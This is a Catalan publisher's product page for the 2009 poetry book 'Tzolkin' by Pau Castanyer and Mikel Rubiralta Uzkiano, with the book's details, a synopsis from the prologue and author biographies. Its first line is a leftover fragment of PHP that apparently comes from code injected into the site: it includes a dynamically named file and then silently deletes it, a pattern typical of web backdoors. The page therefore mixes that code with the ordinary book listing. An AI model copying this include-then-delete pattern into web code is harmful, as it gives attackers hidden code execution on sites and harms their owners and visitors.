");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Tzolkin
Notícies Relacionades

Pau Castanyer

10/01/2010 Antoni Serra

Por fortuna, a este viejo malsofrit -si, huraño, pero sentimental- de tarde en tarde le llega algún libro que le devuelve el sentido (además del placer) de vivir. "Només hi ...

Tzolkin

Castanyer i Fe, Pau; Rubiralta Uzkiano, Mikel

E-book
Prologuista:
Miguel Rivera Dorado
Col·lecció:
Magatzem Can Toni
Tema:
Poesia
Pàgines:
68
PVP:
10.00
PVP E-book:
5.00
ISBN:
978-84-92703-39-5
Data d'Edició:
15/11/2009
Comprar
Sinopsi
«El tzolkin és un calendari dels antics maies amb un cicle de 260 dies, que és el resultat d'una combinació de 13 números i 20 símbols que s'anaven repetint sistemàticament, i que servia com a acte ritual per a definir-se com a persones, amb el seu destí, dins el conjunt social.

Tzolkin ens desvetllarà algun dels seus secrets quan ens hi acostem amb sensibilitat desperta i imaginació il·limitada. Si a aquesta fórmula hi afegim la bellesa, és possible que n’obtinguem sorprenents resultats. La poesia de Pau Castanyer és de vellut, les seves paraules llisquen sinuosament com molts cròtals a la selva maia, i penetren en nosaltres com la càrrega del temps penetra en el cosmos. Qualsevol maia de Tikal o de Palenque hauria comprès en el segle VIII, per exemple, aquestes paraules, i hauria coincidit, no cal dubtar-ne gens, amb el poeta en la interpretació dels signes. En el meu cas, em rendeixo a l’evidència, el temps maia és filosofia, és poesia, Pau Castanyer ens ho descobreix.»


del pròleg de Miguel Rivera Dorado

Pau Castanyer i Fe
(Palma 1983)
Externament anomenat poeta i supernova en potència, va néixer i créixer a Son Bessó.
Actualment segueix residint a la perifèria palmesana.
És amant del pa torrat amb all fregat, els silencis ben trobats, les amistats  amples i els horitzons després de la ciutat; i enemic del cinema amb interrupcions, l'aire hipercondicionat i la falsa amabilitat.
A Edicions Documenta Balear ha publicat Nedar-te la pell (2008), Tzolkin (2009) i De com un poema és sempre el mateix poema, o pedres, o llengües, o qualsevol mugró o, potser, no hi ha temps que no torn (2012).


Mikel Rubiralta Uzkiano
Mikel Rubiralta Uzkiano
(1984)
 
Artista frustrat de professió i enginyer agrícola de vocació, va néixer i créixer a Bilbao.
Actualment resideix a la perifèria barcelonesa.
És amant de les males herbes subversives, el compost polític i dels botons alliberats; i enemic de les robes empoltronides, els codis de barrots i el ciment expandit.

Recomanar
Comentar
Comentaris (0)